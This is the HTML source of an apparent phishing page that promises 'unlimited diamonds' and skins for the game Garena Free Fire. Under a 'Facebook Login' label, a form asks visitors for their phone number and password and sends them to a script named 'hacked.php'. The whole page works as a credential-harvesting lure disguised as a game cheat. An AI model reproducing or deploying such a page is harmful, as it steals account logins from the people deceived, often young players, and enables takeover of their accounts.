<!DOCTYPE html>
<html>
<head>
	<title>Diamond Hacking</title>
	<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Akronim">
<style type="text/css">
	#div1 {
		background-image: url('https://media1.giphy.com/media/ohONS2y8GTDoI/100.webp?cid=ecf05e47syl88it9uqq5jlpryns7tmncppax8k0zu01ps873&rid=100.webp');
		text-align: center;
		color: red;
		border-radius: 10px;
		padding:2px;
	}
	#left {
		float:left;
		margin-top:30px;
		width:48%;
		text-align: center;
	}
	table {
		margin-left:25%;
	}
	#c1 {
		box-shadow: 3px 2px 1px black;
		font-weight: bold;
		color:black;
		background-color: khaki;
		padding:1px;
		font-size: 18px;
		}
	#right {
		float: left;
		margin-top:30px;
		width:48%;
		background-image: url('https://media1.giphy.com/media/cM1i8pBpftWlUJkt4E/200w.webp?cid=ecf05e47dorgx28cvegcb2jzj61z1mki5ww3ygo2umtw80rz&rid=200w.webp');
		background-repeat: no-repeat;
		background-size: 500px;
		color:cyan;
		padding:10px;
	}
	p {
		text-shadow: 3px 3px 4px orange;
	}
</style>
</head>
<body>
	<div id="div1">
        <h2>Unlimited Diamond Hacking</h2>
    </div>
        <div id="left">
        	<p><b>Login here to get unlimited diamonds directly into your working account!</b></p>
        	<span>Facebook Login</span>
		<form action="hacked.php" method="post" enctype="multipart/form-data">
			<table>
				<tr>
					<th>Phone Number</th>
					<td><input type="tel" pattern="[0-9]{10}" title="Enter 10 digits only"placeholder="+91-" name="pno" required></td>
				</tr>
				<tr>
					<th>Password</th>
					<td><input type="password"pattern=".{6,20}" title="Enter valid password" name="password" required></td>
				</tr>
			</table><br>
			<input type="submit"  id="c1"value="Login" name="">
		</form>
	</div>
	<div id="right">
		<h3>Garena Freefire</h3>
		<p>Get new skins for all items, working 100% . Get all rewards within no time.</p>
	</div>

</body>
</html>